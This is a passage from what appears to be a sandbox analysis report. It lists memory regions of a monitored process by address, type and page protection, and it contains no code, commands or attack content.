page read and write
|
||
|
A76000
|
heap
|
page read and write
|
||
|
9F3000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
261B000
|
heap
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
7FE93E02000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2B4000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
1ABC0000
|
heap
|
page execute and read and write
|
||
|
1E33000
|
trusted library allocation
|
page read and write
|
||
|
D74000
|
heap
|
page read and write
|
||
|
1285D000
|
trusted library allocation
|
page read and write
|
||
|
7FE93E54000
|
trusted library allocation
|
page read and write
|
||
|
490000
|
unkown
|
page write copy
|
||
|
7FE93EB0000
|
trusted library allocation
|
page read and write
|
||
|
1C4AE000
|
stack
|
page read and write
|
||
|
1B6DE000
|
stack
|
page read and write | page guard
|
||
|
28D000
|
heap
|
page read and write
|
||
|
1A934000
|
heap
|
page execute and read and write
|
||
|
7FE93EA0000
|
trusted library allocation
|
page read and write
|
||
|
D83000
|
heap
|
page read and write
|
||
|
6FD000
|
stack
|
page read and write
|
||
|
467000
|
unkown
|
page readonly
|
||
|
7FE93E70000
|
trusted library allocation
|
page read and write
|
||
|
D6F000
|
heap
|
page read and write
|
||
|
7FE93F10000
|
trusted library allocation
|
page read and write
|
||
|
9EE000
|
heap
|
page read and write
|
||
|
B7E000
|
unkown
|
page read and write
|
||
|
358000
|
heap
|
page read and write
|
||
|
12771000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE93C3B000
|
trusted library allocation
|
page read and write
|
||
|
7FE93E07000
|
trusted library allocation
|
page read and write
|
||
|
A99000
|
heap
|
page read and write
|
||
|
7FE93F90000
|
trusted library allocation
|
page read and write
|
||
|
A07000
|
heap
|
page read and write
|
||
|
7FE93EC0000
|
trusted library allocation
|
page read and write
|
||
|
9E8000
|
heap
|
page read and write
|
||
|
128E0000
|
trusted library allocation
|
page read and write
|
||
|
43C000
|
heap
|
page read and write
|
||
|
A8B000
|
heap
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
A1A000
|
heap
|
page read and write
|
||
|
A83000
|
heap
|
page read and write
|
||
|
D0F000
|
heap
|
page read and write
|
||
|
7FE93E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
A72000
|
heap
|
page read and write
|
||
|
7FE93E24000
|
trusted library allocation
|
page read and write
|
||
|
7FE93E0C000
|
trusted library allocation
|
page read and write
|
||
|
1A9CA000
|
heap
|
page read and write
|
||
|
1C75000
|
heap
|
page read and write
|
||
|
7FE93F20000
|
trusted library allocation
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
39F000
|
heap
|
page read and write
|
||
|
2E56000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
300000
|
heap
|
page read and write
|
||
|
2616000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3A0000
|
unkown
|
page readonly
|
||
|
9FC000
|
heap
|
page read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
1B3000
|
stack
|
page read and write
|
||
|
27CD000
|
trusted library allocation
|
page read and write
|
||
|
181000
|
stack
|
page read and write
|
||
|
A79000
|
heap
|
page read and write
|
||
|
7FE93F35000
|
trusted library allocation
|
page read and write
|
||
|
7FE93DC0000
|
trusted library allocation
|
page read and write
|
||
|
9FF000
|
heap
|
page read and write
|
||
|
492000
|
unkown
|
page read and write
|
||
|
3A1000
|
unkown
|
page execute read
|
||
|
2862000
|
heap
|
page read and write
|
||
|
7FE93DD7000
|
trusted library allocation
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
D8B000
|
heap
|
page read and write
|
||
|
A1B000
|
heap
|
page read and write
|
||
|
2470000
|
heap
|
page read and write
|
||
|
2D2000
|
heap
|
page read and write
|
||
|
1B70000
|
heap
|
page read and write
|
||
|
7FE93F15000
|
trusted library allocation
|
page read and write
|
||
|
A05000
|
heap
|
page read and write
|
||
|
9EF000
|
heap
|
page read and write
|
||
|
9F7000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
1AB1F000
|
stack
|
page read and write
|
||
|
7FE93EA0000
|
trusted library allocation
|
page read and write
|
||
|
DE9000
|
heap
|
page read and write
|
||
|
1B56C000
|
stack
|
page read and write
|
||
|
7FE93C54000
|
trusted library allocation
|
page read and write
|
||
|
7FE93C50000
|
trusted library allocation
|
page read and write
|
||
|
A7F000
|
heap
|
page read and write
|
||
|
A08000
|
heap
|
page read and write
|
||
|
7FE93C24000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
491000
|
unkown
|
page write copy
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
DAA000
|
heap
|
page read and write
|
||
|
A91000
|
heap
|
page read and write
|
||
|
D73000
|
heap
|
page read and write
|
||
|
7FE93F70000
|
trusted library allocation
|
page read and write
|
||
|
DE9000
|
heap
|
page read and write
|
||
|
9DB000
|
heap
|
page read and write
|
||
|
957000
|
heap
|
page read and write
|
||
|
3DD000
|
heap
|
page read and write
|
||
|
24A0000
|
heap
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
A27000
|
heap
|
page read and write
|
||
|
98C000
|
heap
|
page read and write
|
||
|
12821000
|
trusted library allocation
|
page read and write
|
||
|
2DAF000
|
stack
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
A0E000
|
heap
|
page read and write
|
||
|
A3A000
|
heap
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
18E000
|
stack
|
page read and write
|
||
|
1DE000
|
stack
|
page read and write
|
||
|
1B7C0000
|
heap
|
page read and write
|
||
|
249F000
|
stack
|
page read and write
|
||
|
1B74B000
|
stack
|
page read and write
|
||
|
9FB000
|
heap
|
page read and write
|
||
|
2DF000
|
heap
|
page read and write
|
||
|
7FE93F80000
|
trusted library allocation
|
page read and write
|
||
|
9E3000
|
heap
|
page read and write
|
||
|
89C000
|
stack
|
page read and write
|
||
|
1A930000
|
heap
|
page read and write
|
||
|
9EC000
|
heap
|
page read and write
|
||
|
1C3C4000
|
stack
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
2FEF000
|
stack
|
page read and write
|
||
|
9DC000
|
heap
|
page read and write
|
||
|
989000
|
heap
|
page read and write
|
||
|
1B775000
|
heap
|
page read and write
|
There are 615 hidden memdumps, click here to show them.